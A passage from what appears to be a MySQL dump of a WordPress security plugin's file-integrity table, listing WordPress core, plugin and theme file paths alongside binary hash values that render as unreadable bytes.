J�WL�+<�I���S4y$)T@','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y\'�@>@������','��o���m�z�Jr;P���%��ːdUS3��>','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�p��=r���8ʗ�','�\\��Z���`\\@��*�Ǘ�o3B�&j\0','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���…�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('���:�[�f��KZ�?�','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�N���.���,','r�ŃM\n�.�H���D�3w�m�yb���','',0,'?'),('���(_�J�D~���','wp-content/themes/twentynineteen/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�j%mx�t�h��','��m�ۄ�({�V�3�R�#/.pBց\')r@��','',0,'?'),('��$����	7U�^�','wp-content/themes/magazine-hoot/widget/content-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ӎ�ῥg-R�=','~m_�{�E_�ɲ>м_%\\Y(K��$Z�s','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�M���)h�M���۟R','wp-content/themes/magazine-hoot/include/admin/css/customize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Z�Q-ɤ�<��Z�','�����S3	��]5\\-�O��L�����(','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����L�7HnWE�DM�','wp-content/plugins/wp-cerber/assets/flags/sj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Th�;��ͯ�|!fE�\"\n','��(��o{il�A���	\'�Z�E�I�d/&�','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!𴴨jz�F#�����d�ĚMP','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����:�ԕw$ބ�j','�a���95�]��ꐺW�e+,�O��� &�u','',0,'?'),('���(Sa���[/','wp-content/themes/magazine-hoot/include/admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\�����,���','�N�q�\Z-�����(�4	��h��5�_���l�','',0,'?'),('�?���}g����W�Y�','wp-content/themes/magazine-hoot/hybrid/customize/control-dropdown-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����s���P���{���','�\\���*͋$NdC�hf[��X(����$>+','',0,'?'),('�D��?ļ�\n����','wp-content/plugins/wp-cerber/assets/flags/ml.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hϸ-�1�՞��3','�A\0�]�ҕ#�:\r40�2��W�A%��)V\n','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�~yEfF��d�x��','O�tJʰ�Z伡��V�S<ͤw�z1W�~>��0)','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('�|Z\r���|�!\'Zl�<','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r慎s���պSc','�\n<h\0u�8�y�{l�\rc@h��t�UX8h��','',0,'?'),('��6�)�6@�2{��{','wp-content/themes/magazine-hoot/template-parts/comments-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bk���H�ӎ��Bf','�r��9��<DVT��\Z��P�ͧ#�3d�]jT','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z>?�iY+Q�K�C��','r������쐋����&5�Q8�C\"���K�','',0,'?'),('���H\03�ۡ�E�p�$$','wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�)�\Z~w�������','�%���K.�P��V�vZ�ښ�[\0�ȗfE��6','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	P�f�R2���.��z','��/��\n���0ۥK���.�Į�\r&$B�\Z}','',0,'?'),('�����Ƅ���NB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('���>9ce�R�$��!','wp-content/themes/magazine-hoot/hybrid/admin/class-post-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�`��\'�Ґ� �','��Ҫ�_vf��ꏷKͻ�d��bL�\n','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����km�\n	H�M��','FO���V3\"���������!k�P�','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�!Y;��I-���u','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�rV��S�|�k���',' ��^��67�+�k�`�ۍ���]B���G��p','',0,'?'),('�#�?���Gc	¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$޲3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��΀.f:��Ϥ�F','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR	���Q�f�;\ne�\r�6\\','',0,'?'),('����\r۪N�B/�nj�','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���>on��;_�ك','��$G#�Hb�ZEl<:�Z�j\n��䨭�٣�xʫ','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�����\r�]@��','�M�!҃�hMg?LO�\0ş�@���M�\"M�.','',0,'?'),('���c��s�2�����','wp-content/themes/magazine-hoot/include/admin/images/premium-lesscss.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w$�����e�iz�','�-���)���&)����U�5�����&̿�','',0,'?'),('��	�\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��˧0�o�r�j�{�','<������\"W63�`�/p�0h���LH�MG1','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�e#=�>��ᬂ�?��','wp-content/themes/magazine-hoot/include/admin/images/premium-scroller.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�X�����ck�V��','V�X�7V��e>b�k�l<s��рC��^Eh','',0,'?'),('��}Hy�M��1�ě8','wp-admin/images/about-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nڢ�U�����M�','��@^��Iͮ�s������L�:}|9�ƶ�KXk','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F0�ݶN��j�!�','����mn��hAɉg8��gj���m[)�B��','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W!j`(�YՌ�f�','��2�&�;��F�7�A\nOM�X�����','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('�1�ǂ�W��y2�xH(','wp-content/themes/magazine-hoot/include/admin/images/sidebar-full.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�*J��/F[�R','!+�\'!�\0H�FՄCh\\8�)�~du9����','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w ���y����C>�','��vV��� v�b��\Z�[Zu�G� GnA�\"�H77','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��b�)EoB�$�w�M','�x�c�$I-=�VMjSd�b�6A;{��','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^	�4j��/�?\\��','�V��a�U�ˁ�F�V���ߴYn$\ZӸ#�\'R�K�','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S�	9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��4��)�R�>��i','�4xZP���]�QT[6�Z;����n���P�','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52]��{�}��	`X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('���ƌ\Z��,�H��','wp-content/themes/twentynineteen/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xZ�SY�S�m\"	��a','�UYX�}�m�\",W�9:۸�.�෦Ho�\"�','',0,'?'),('��K���K�1�l�!�D','wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ƅ�&8����','̸����������\n�X���Gz�y�\\Kq�WQ','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w�	L�e�Fz�]�','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('��Z�Hz��ӻ��\r���','wp-content/themes/magazine-hoot/include/admin/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��h�P<�xn>\"�','q���F:E���e-)T1��d�� ��L��:�','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('�ګ�c\r2�8.�\'�\"','wp-content/themes/twentytwentyone/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?yO��+��D��','�\n=/��?I�l�b�i��8�A�HxV�5A?vi','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6�׈���C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6݋���h	','',0,'?'),('�&½1YxFu����mpC','wp-content/themes/twentytwentyone/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۏ�5����e����~7','r|1���	P.�;FvrF���0^�ػ�	�R^��','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4�	G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X :��','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѿD�\0�|����s�W','�\n*�v�Q��(G��i�u�3@��4��*���','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�]��4>�*I��w�','��خ`��$�%�T�{����rKN���k6��','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rz[�HH;nc�.u@�','��>�X�b]|$�Xq���@N�]m�Y�v�t��','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n|7�>&���~�','�W\n��U,���5��m�_7�qv�L-�K��P%','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�R�����b�jS.�8�','wp-content/themes/magazine-hoot/include/admin/images/content-block-style-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��@�\'b�c�r�iN','t�9�<q��������h���J��@��,','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�;s�ռ�;\0+g�','��T���D�H.1\0�B6�E?{��s��g\"��$�','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('���c����Vs�9�o��','wp-includes/css/dist/editor/editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('�܋YW��8ķd����','wp-content/themes/magazine-hoot/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w`fگ�A����]��','�e���h6����^���B,��\n5��Z�','',0,'?'),('��O��4����%m�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��?1�	���4��M�','e��2M�B���\n\0��7�0�Zz�F%�s','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0,	Ra�uhX��c���','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\,yI����D�a','৓��}�u�}@�\Z�\\,�XK��r�;7f��','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P	nԔ/\rzA�\"\nd','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('��\\����\r� ��:#�K','wp-content/plugins/wp-cerber/assets/flags/bo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0-�a�vv��','=�IS}�@l��U�%s�=�FG41R�\'�','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZZb&\'���C����','���{���E�#G�`T`��4��4ܯ��','',0,'?'),('�����dD����+P�','wp-content/themes/twentytwenty/template-parts/modal-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�xρ�	�.��P�','=w��q��:��\'�`�CL,IH��E�Ǖ��\0�g','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g